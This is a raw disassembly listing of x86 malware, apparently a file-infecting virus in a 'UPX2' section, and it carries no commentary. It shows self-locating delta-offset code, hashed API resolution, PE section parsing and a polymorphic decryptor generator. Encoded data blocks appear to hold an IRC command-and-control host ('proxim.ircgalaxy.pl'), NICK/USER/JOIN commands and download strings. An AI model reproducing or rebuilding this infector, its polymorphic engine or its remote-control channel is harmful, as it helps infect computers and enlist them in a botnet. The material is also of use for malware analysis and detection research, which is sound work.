add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_31509C02 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_31509CE5
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_31509CE5
mov ecx, [ebp+401588h]
jecxz short loc_31509C9D
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31509C9D: ; CODE XREF: UPX2:31509C8F�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_31509C02
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_31509C02
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_31509C02
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_31509CE5
lea ecx, [edi+23F5h]
call sub_31509C02
loc_31509CE5: ; CODE XREF: UPX2:31509C4F�j
; UPX2:31509C87�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401A43EDh, 8DFF6A00h, 401A0E95h
dd 0CD525000h, 2A002420h, 0CC48300h, 5485C766h, 0CD00401Ah
dd 5685C720h, 2400401Ah, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 401A72B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4035F095h, 0CC48300h
dd 3574958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 581A6AC3h, 9E8h, 61428D00h, 75C9FEAAh
db 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_31509DCA proc near ; CODE XREF: sub_3150A635+1B�p
; sub_3150A7AD+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_31509DCA endp
; ---------------------------------------------------------------------------
dw 0E855h
dd 0
dd 9ED815Dh, 8B00401Bh, 40364A9Dh, 247C8300h, 840F0008h
dd 0B9h, 208EC81h, 68540000h, 104h, 359095FFh, 0FC8B0040h
dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
dd 358C95FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
dd 6801h, 0FF524000h, 40355C95h, 0F6859600h, 54505B74h
dd 10468h, 0B4FF5700h, 22024h, 2895FF00h, 59004036h, 1674C085h
dd 8B5014E3h, 52006AD4h, 0FF565751h, 4035CC95h, 0C0855900h
dd 0FF56D075h, 40353C95h, 44578D00h, 446A5752h, 4978D58h
dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
dd 40356495h, 8C48100h, 0FF000002h, 0FF082474h, 40361895h
dd 95FF5300h, 403618h, 4C25Dh, 750A3E80h, 8D8B4601h, 401584h
dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
dd 51006A51h, 95FF5356h, 403610h, 0FC13B59h, 0DF85h, 0A2858D00h
dd 6A00401Dh, 0C6800h, 53500000h, 361095FFh, 0C3D0040h
dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 0BC95FF52h
dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
dd 0FF006461h, 40362095h, 74C08500h, 89C93336h, 40364A85h
dd 685100h, 51800002h, 0FF505651h, 40362495h, 3958D00h
dd 5000401Bh, 5154C933h, 51515250h, 356C95FFh, 4870040h
dd 3C95FF24h, 0F8004035h, 778D80C3h, 1004015h, 4F53C3F9h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 0F0FF0002h, 2F2A1155h, 786F7270h, 692E6D69h, 61676372h
dd 7978616Ch, 6C702Eh, 4B43494Eh, 68797320h, 7A62736Fh
dd 53550A62h, 79205245h, 35303230h, 2E203130h, 3A202E20h
dd 494F4A2Dh, 7626204Eh, 75747269h, 0E8550Ah, 5D000000h
dd 1DB4ED81h, 85C60040h, 401577h, 9495FF00h, 0C1004035h
dd 3C741FE8h, 0B58B1E6Ah, 403550h, 2E3CAC59h, 81662A75h
dd 751DFF3Eh, 40BD8D23h, 8B004036h, 0A5570276h, 858DA566h
dd 40336Ah, 3390858Fh, 89FA0040h, 4E8CFA46h, 1B1FBFEh
dd 43EBCFE2h, 15B1858Dh, 6A500040h, 0FF0E6A00h, 4035A495h
dd 247C8300h, 2B750408h, 4E8h, 43465300h, 8895FF00h, 0E8004035h
dd 0FFFFFC48h, 7E8h, 43465300h, 534F5Fh, 358895FFh, 31E80040h
dd 0E8FFFFFCh, 0FFFFF356h, 13038DFFh, 0BE80040h, 55000000h
dd 33524553h, 4C442E32h, 95FF004Ch, 40359Ch, 0AE8h, 70737700h
dd 746E6972h, 50004166h, 354895FFh, 85890040h, 403554h
dd 8D8D310Fh, 4018E0h, 36468589h, 0FF510040h, 40359C95h
dd 4689300h, 8D000000h, 4018EDB5h, 0BD8D5900h, 40362Ch
dd 0FFF6D6E8h, 85C766FFh, 401D67h, 0A583F0FFh, 401D69h
dd 27958D00h, 5000401Dh, 6A016A54h, 2685200h, 0FF800000h
dd 40363095h, 5AC08500h, 8D8D2275h, 401D5Ah, 8D066A52h
dd 401D67B5h, 50565400h, 0FF525150h, 40363495h, 95FF5800h
dd 40362Ch, 384D85C6h, 0E8000040h, 0Ch, 434F5357h, 2E32334Bh
dd 4C4C44h, 359C95FFh, 68930040h, 7, 1844B58Dh, 8D590040h
dd 4035FCBDh, 0F651E800h, 0CE8FFFFh, 57000000h, 4E494E49h
dd 442E5445h, 0FF004C4Ch, 40359C95h, 0FC08500h, 1E784h
dd 5689300h, 8D000000h, 401882B5h, 0BD8D5900h, 403618h
dd 0FFF61AE8h, 1CBD83FFh, 4036h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4035FCh, 190C481h, 8B500000h
dd 52006AD4h, 361C95FFh, 0C0850040h, 680D7559h, 1388h
dd 35BC95FFh, 0E2EB0040h, 1D69BD83h, 75000040h, 6D858D29h
dd 5000401Dh, 360895FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 69858F30h, 0C600401Dh, 40384D85h, 6A0100h
dd 26A016Ah, 361495FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1D65958Dh, 106A0040h, 95FF5352h, 403604h, 850FC085h
dd 0F2h, 1D86BD8Dh, 8B10040h, 0FFFABCE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 9895FF54h, 8D004035h, 401D94BDh, 0E801B100h
dd 0FFFFFA9Dh, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 403554h, 0C60CC483h
dd 8D200647h, 401D8195h, 68006A00h, 21h, 95FF5352h, 403610h
dd 14247C8Dh, 5895FF57h, 0C6004035h, 400A3804h, 5750006Ah
dd 1095FF53h, 3004036h, 0A2BD8DE6h, 6A00401Dh, 0C6800h
dd 53570000h, 361095FFh, 0C3D0040h, 75000000h, 4EB58D4Dh
dd 8D004036h, 40384D8Dh, 6ACE2B00h, 53565100h, 360C95FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40364Eh, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF8h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 40364Eh, 0F787A4F3h, 0FF53B9EBh, 40360095h
dd 77BD8000h, 1004015h, 30682A74h, 0FF000075h, 4035BC95h
dd 4DBD8000h, 4038h, 85C71174h, 401D69h, 0
dd 384D85C6h, 0E9000040h, 0FFFFFE56h, 158085C7h, 40h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 40A0D21h, 0ED30C784h
dd 484FD479h, 29403752h, 5710A614h, 7E3AAB59h, 6A1A73C1h
dd 13606EF9h, 0E510A614h, 4727B1FAh, 5C6299ADh, 52C26CCCh
dd 0D8B8B3h, 12h dup(0)
dd 6D000000h
db 8, 0F2h, 10h
; =============== S U B R O U T I N E =======================================
sub_3150A57F proc near ; CODE XREF: sub_3150A5C6:loc_3150A623�p
; sub_3150A686+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3150A59B: ; CODE XREF: sub_3150A57F+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3150A5BD
cmp eax, [edx+8]
jnb short loc_3150A5BD
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_3150A5C2
; ---------------------------------------------------------------------------
loc_3150A5BD: ; CODE XREF: sub_3150A57F+23�j
; sub_3150A57F+28�j
add edx, 28h
loop loc_3150A59B
loc_3150A5C2: ; CODE XREF: sub_3150A57F+3C�j
popa
retn 4
sub_3150A57F endp
; =============== S U B R O U T I N E =======================================
sub_3150A5C6 proc near ; CODE XREF: UPX2:3150A8F2�p
; UPX2:3150A918�p
mov [ebp+4022F7h], al
call sub_3150A635
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_3150A5DD: ; CODE XREF: sub_3150A5C6+1E�j
cmp [eax], ebx
jz short loc_3150A5ED
add eax, 4
loop loc_3150A5DD
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_3150A5ED: ; CODE XREF: sub_3150A5C6+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_3150A607
loc_3150A5F7: ; CODE XREF: sub_3150A5C6+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3150A5F7
mov [ebp+402224h], ebx
loc_3150A607: ; CODE XREF: sub_3150A5C6+2F�j
; sub_3150A635+34�j
cmp dword ptr [edx], 0
jz short loc_3150A611
sub esi, [edx]
add esi, [edx+10h]
loc_3150A611: ; CODE XREF: sub_3150A5C6+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3150A620
push dword ptr [edx]
jmp short loc_3150A623
; ---------------------------------------------------------------------------
loc_3150A620: ; CODE XREF: sub_3150A5C6+54�j
push dword ptr [edx+10h]
loc_3150A623: ; CODE XREF: sub_3150A5C6+58�j
call sub_3150A57F
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_3150A5C6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150A635 proc near ; CODE XREF: sub_3150A5C6+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_3150A686
mov eax, [ebp+40398Eh]
call sub_31509DCA
call sub_3150A672
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3150A66B
mov [ebp+4022A0h], ebx
jmp short loc_3150A607
; ---------------------------------------------------------------------------
loc_3150A66B: ; CODE XREF: sub_3150A635+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_3150A635 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150A672 proc near ; CODE XREF: sub_3150A635+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_3150A686
xor ecx, ecx
retn
sub_3150A672 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150A686 proc near ; CODE XREF: sub_3150A635+10�p
; sub_3150A672+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3150A57F
add edx, [ebp+4039AAh]
add edx, esi
loc_3150A69A: ; CODE XREF: sub_3150A686+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3150A7AB
cmp dword ptr [edx+10h], 0
jz locret_3150A7AB
mov eax, [edx+0Ch]
push eax
call sub_3150A57F
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3150A6C0: ; CODE XREF: sub_3150A686+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3150A6E0
cmp cl, 2Eh
jz short loc_3150A6CF
loc_3150A6CC: ; CODE XREF: sub_3150A686+58�j
inc eax
jmp short loc_3150A6C0
; ---------------------------------------------------------------------------
loc_3150A6CF: ; CODE XREF: sub_3150A686+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3150A6CC
loc_3150A6E0: ; CODE XREF: sub_3150A686+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3150A7A3
cmp word ptr [eax-2], 3233h
jnz loc_3150A7A3
push esi
cmp dword ptr [edx], 0
jnz short loc_3150A703
mov ecx, [edx+10h]
jmp short loc_3150A705
; ---------------------------------------------------------------------------
loc_3150A703: ; CODE XREF: sub_3150A686+76�j
mov ecx, [edx]
loc_3150A705: ; CODE XREF: sub_3150A686+7B�j
add esi, ecx
push ecx
call sub_3150A57F
add esi, [ebp+4039AAh]
loc_3150A713: ; CODE XREF: sub_3150A686+90�j
; sub_3150A686+117�j
lodsd
test eax, eax
js short loc_3150A713
jz loc_3150A7A2
push dword ptr [ebp+4039AAh]
push eax
call sub_3150A57F
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3150A73F: ; CODE XREF: sub_3150A686+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3150A756
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3150A73F
; ---------------------------------------------------------------------------
loc_3150A756: ; CODE XREF: sub_3150A686+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3150A79C
cmp ebx, 0DB6E45A8h
jz short loc_3150A79C
cmp ebx, 0FFA13B59h
jz short loc_3150A79C
cmp ebx, 0ACB522D6h
jz short loc_3150A79C
cmp ebx, 0F358E993h
jz short loc_3150A79C
cmp ebx, 0F358E97Dh
jz short loc_3150A79C
cmp ebx, 0E1253F46h
jz short loc_3150A79C
cmp ebx, 0E1253F30h
jz short loc_3150A79C
call dword ptr [ebp+403992h]
loc_3150A79C: ; CODE XREF: sub_3150A686+D6�j
; sub_3150A686+DE�j ...
pop ebx
jmp loc_3150A713
; ---------------------------------------------------------------------------
loc_3150A7A2: ; CODE XREF: sub_3150A686+92�j
pop esi
loc_3150A7A3: ; CODE XREF: sub_3150A686+60�j
; sub_3150A686+6C�j
add edx, 14h
jmp loc_3150A69A
; ---------------------------------------------------------------------------
locret_3150A7AB: ; CODE XREF: sub_3150A686+18�j
; sub_3150A686+22�j
retn
sub_3150A686 endp
; ---------------------------------------------------------------------------
db 2
; =============== S U B R O U T I N E =======================================
sub_3150A7AD proc near ; CODE XREF: UPX2:3150A8EB�p
; UPX2:3150A911�p
push 4
pop eax
call sub_31509DCA
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_31509DCA
add edx, 8
xchg edx, ecx
loc_3150A7D5: ; CODE XREF: sub_3150A7AD:loc_3150A814�j
push 5
pop eax
call sub_31509DCA
cmp dl, 3
jnb short loc_3150A7ED
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_3150A814
; ---------------------------------------------------------------------------
loc_3150A7ED: ; CODE XREF: sub_3150A7AD+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_3150A80E
mov al, 11h
call sub_31509DCA
mov eax, 1
loc_3150A802: ; CODE XREF: sub_3150A7AD+5D�j
test dl, dl
jz short loc_3150A813
shl eax, 1
dec dl
jmp short loc_3150A802
; ---------------------------------------------------------------------------
jmp short loc_3150A813
; ---------------------------------------------------------------------------
loc_3150A80E: ; CODE XREF: sub_3150A7AD+47�j
mov eax, 80000000h
loc_3150A813: ; CODE XREF: sub_3150A7AD+57�j
; sub_3150A7AD+5F�j
stosd
loc_3150A814: ; CODE XREF: sub_3150A7AD+3E�j
loop loc_3150A7D5
retn
sub_3150A7AD endp
; ---------------------------------------------------------------------------
loc_3150A817: ; CODE XREF: sub_3150B271+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150A82C
mov al, 60h
stosb
loc_3150A82C: ; CODE XREF: UPX2:3150A827�j
test dword ptr [ebp+403431h], 1000003h
jz loc_3150A932
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EEDA53F0h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_3150A8AA
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_3150A875
mov eax, 2E8B6467h
loc_3150A875: ; CODE XREF: UPX2:3150A86E�j
stosd
mov ax, 0
stosw
jz short loc_3150A881
mov al, 5Dh
stosb
loc_3150A881: ; CODE XREF: UPX2:3150A87C�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_3150A8A8
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_3150A8A8
mov eax, 0F8ED83h
loc_3150A8A8: ; CODE XREF: UPX2:3150A890�j
; UPX2:3150A8A1�j
stosd
dec edi
loc_3150A8AA: ; CODE XREF: UPX2:3150A85D�j
test dword ptr [ebp+403431h], 3
jz short loc_3150A8BA
mov al, 0E9h
stosb
stosd
loc_3150A8BA: ; CODE XREF: UPX2:3150A8B4�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_3150A932
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_3150A7AD
mov al, 20h
call sub_3150A5C6
jecxz short loc_3150A932
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_3150A925
call sub_3150A7AD
mov al, 1Fh
call sub_3150A5C6
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_3150A925: ; CODE XREF: UPX2:3150A90F�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_3150A932: ; CODE XREF: UPX2:3150A836�j
; UPX2:3150A8D1�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3150A950
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3150A950: ; CODE XREF: UPX2:3150A93C�j
test dword ptr [ebp+403431h], 8
jnz short loc_3150A9A6
cmp byte ptr [ebp+40342Fh], 0
jz short loc_3150A9A6
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_3150A9A4
mov al, 49h
stosb
mov ax, 0FC75h
loc_3150A9A4: ; CODE XREF: UPX2:3150A99B�j
stosw
loc_3150A9A6: ; CODE XREF: UPX2:3150A95A�j
; UPX2:3150A963�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_3150A9C7
mov al, 58h
or al, [ebp+403429h]
stosb
loc_3150A9C7: ; CODE XREF: UPX2:3150A9BC�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_3150A9DA
add ah, 28h
loc_3150A9DA: ; CODE XREF: UPX2:3150A9D5�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_3150A9FE
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3150A9FE: ; CODE XREF: UPX2:3150A9F3�j
test dword ptr [ebp+403431h], 80h
jnz short loc_3150AA15
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_3150AA52
; ---------------------------------------------------------------------------
loc_3150AA15: ; CODE XREF: UPX2:3150AA08�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_3150AA27
mov al, 29h
loc_3150AA27: ; CODE XREF: UPX2:3150AA23�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_3150AA4A
mov ah, 0C8h
loc_3150AA4A: ; CODE XREF: UPX2:3150AA46�j
or ah, [ebp+40342Ah]
stosw
loc_3150AA52: ; CODE XREF: UPX2:3150AA13�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_3150AAD6
test dword ptr [ebp+403431h], 400h
jnz short loc_3150AA81
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_3150AACE
; ---------------------------------------------------------------------------
loc_3150AA81: ; CODE XREF: UPX2:3150AA74�j
test dword ptr [ebp+403431h], 800h
jnz short loc_3150AA9E
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_3150AAB3
; ---------------------------------------------------------------------------
loc_3150AA9E: ; CODE XREF: UPX2:3150AA8B�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_3150AAB3: ; CODE XREF: UPX2:3150AA9C�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_3150AAC6
add ah, 8
loc_3150AAC6: ; CODE XREF: UPX2:3150AAC1�j
or ah, [ebp+40342Bh]
stosw
loc_3150AACE: ; CODE XREF: UPX2:3150AA7F�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_3150AAD6: ; CODE XREF: UPX2:3150AA68�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_3150AAEB
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3150AAEB: ; CODE XREF: UPX2:3150AAE0�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_3150AAFB
add al, 4
loc_3150AAFB: ; CODE XREF: UPX2:3150AAF7�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_3150AB18
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3150AB18: ; CODE XREF: UPX2:3150AB0F�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_3150AB2A
mov ah, 29h
loc_3150AB2A: ; CODE XREF: UPX2:3150AB26�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_3150AB48
mov al, 86h
loc_3150AB48: ; CODE XREF: UPX2:3150AB44�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_3150AB5C
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3150AB5C: ; CODE XREF: UPX2:3150AB53�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_3150AB73
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_3150AB82
; ---------------------------------------------------------------------------
loc_3150AB73: ; CODE XREF: UPX2:3150AB66�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_3150AB82: ; CODE XREF: UPX2:3150AB71�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_3150ABBD
test dword ptr [ebp+403431h], 40000h
jnz short loc_3150ABB4
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3150ABBC
; ---------------------------------------------------------------------------
loc_3150ABB4: ; CODE XREF: UPX2:3150AB98�j
mov al, 40h
or al, [ebp+40342Bh]
loc_3150ABBC: ; CODE XREF: UPX2:3150ABB2�j
stosb
loc_3150ABBD: ; CODE XREF: UPX2:3150AB8C�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_3150ABD9
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_3150ABE1
; ---------------------------------------------------------------------------
loc_3150ABD9: ; CODE XREF: UPX2:3150ABC7�j
mov al, 48h
or al, [ebp+40342Ah]
loc_3150ABE1: ; CODE XREF: UPX2:3150ABD7�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_3150AC15
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_3150AC30
mov cl, 77h
jmp short loc_3150AC30
; ---------------------------------------------------------------------------
loc_3150AC15: ; CODE XREF: UPX2:3150ABEE�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_3150AC30: ; CODE XREF: UPX2:3150AC0F�j
; UPX2:3150AC13�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_3150ACDA
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_3150AC71
mov eax, 2E876467h
loc_3150AC71: ; CODE XREF: UPX2:3150AC6A�j
stosd
mov eax, 0
stosw
jnz short loc_3150AC81
mov ax, 0E58Bh
stosw
loc_3150AC81: ; CODE XREF: UPX2:3150AC79�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_3150ACD7
test dword ptr [ebp+403431h], 8000000h
jz short loc_3150ACC9
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_3150ACC4
mov ax, 424h
stosw
jmp short loc_3150ACD7
; ---------------------------------------------------------------------------
loc_3150ACC4: ; CODE XREF: UPX2:3150ACBA�j
mov al, 8
stosb
jmp short loc_3150ACD7
; ---------------------------------------------------------------------------
loc_3150ACC9: ; CODE XREF: UPX2:3150ACA1�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_3150ACDA
; ---------------------------------------------------------------------------
loc_3150ACD7: ; CODE XREF: UPX2:3150AC95�j
; UPX2:3150ACC2�j ...
mov al, 0C9h
stosb
loc_3150ACDA: ; CODE XREF: UPX2:3150AC4D�j
; UPX2:3150ACD5�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150AD06
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_3150AD06: ; CODE XREF: UPX2:3150ACE4�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_3150AD71
test dword ptr [ebp+403431h], 20000000h
jz short loc_3150AD37
loc_3150AD2A: ; CODE XREF: UPX2:3150AD35�j
test edi, 3
jz short loc_3150AD37
mov al, 90h
stosb
jmp short loc_3150AD2A
; ---------------------------------------------------------------------------
loc_3150AD37: ; CODE XREF: UPX2:3150AD28�j
; UPX2:3150AD30�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
